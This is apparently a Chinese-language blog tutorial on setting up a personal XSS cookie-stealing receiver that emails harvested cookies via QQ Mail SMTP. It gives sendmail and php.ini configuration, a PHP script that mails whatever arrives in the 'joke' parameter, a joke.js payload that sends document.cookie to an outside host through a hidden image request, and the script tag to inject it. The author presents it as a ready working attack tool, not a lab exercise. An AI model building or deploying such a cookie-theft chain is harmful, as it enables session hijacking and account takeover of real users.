初接触这行学习时,无非觉得Xss就是alert及script钓鱼,(以至于我还是那么菜)以至于没怎么展开学习,现如今随着学习的深入后,发现Xss的世界是如此的有意思;
缘由是在网上找了很多在线平台,发现邮件功能都没法使用,也不知道是我钓鱼还是网站钓鱼;(
没办法只能自己搭建一个。
搭建XSS Cookie邮件接收
环境
环境 :phpstudy、Windos、QQ邮箱
0x01 下载
https://www.glob.com.au/sendmail/
0x02 邮件服务配置
找到设置
在账户里找到SMTP服务开启,如果开启了直接点击授权码。授权码一定要记住
0x03 sandmail 配置
- 找到下载的软件 打开sendmail.ini
smtp_server=smtp.qq.com // 邮件服务器
smtp_port=465 // 端口
auth_username=你的邮箱地址@qq.com
auth_password=授权码
force_sender=你的邮箱地址@qq.com
0x04 php配置
-
- 然后找到你网站所对应的的PHP 版本配置文件 php.ini
- 然后找到你网站所对应的的PHP 版本配置文件 php.ini
- 搜索mail ,找到mail function,记得把前面的顿号去掉。
这几个地方替换成自己所对应的,这个exe就是刚刚下载的文件路径
sendmail_path =“c:\xxxx\ sendmail\sendmail.exe -t”
0x05 代码
- 新建一个sendmail.php
<?php
$cookie = $_GET['joke'];
if(isset($_GET['joke']))
{
$to = "[email protected]"; // 邮件接收者
$subject = "COOKIE"; // 邮件标题
$message = $_GET['joke']; // 邮件正文
$from = "[email protected]"; // 邮件发送者
$headers = "From:" . $from; // 头部信息设置
mail($to,$subject,$message,$headers);
echo "ok";
}else
echo "error";
?>
- 新建joke.js
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://xxxx/sendmai.php?joke='+encodeURIComponent(document.cookie);
# 地址为sendphp的地址
- xss代码
<script src=http://xxx/joke.js> </script>
访问js成功后就可以去插远程脚本了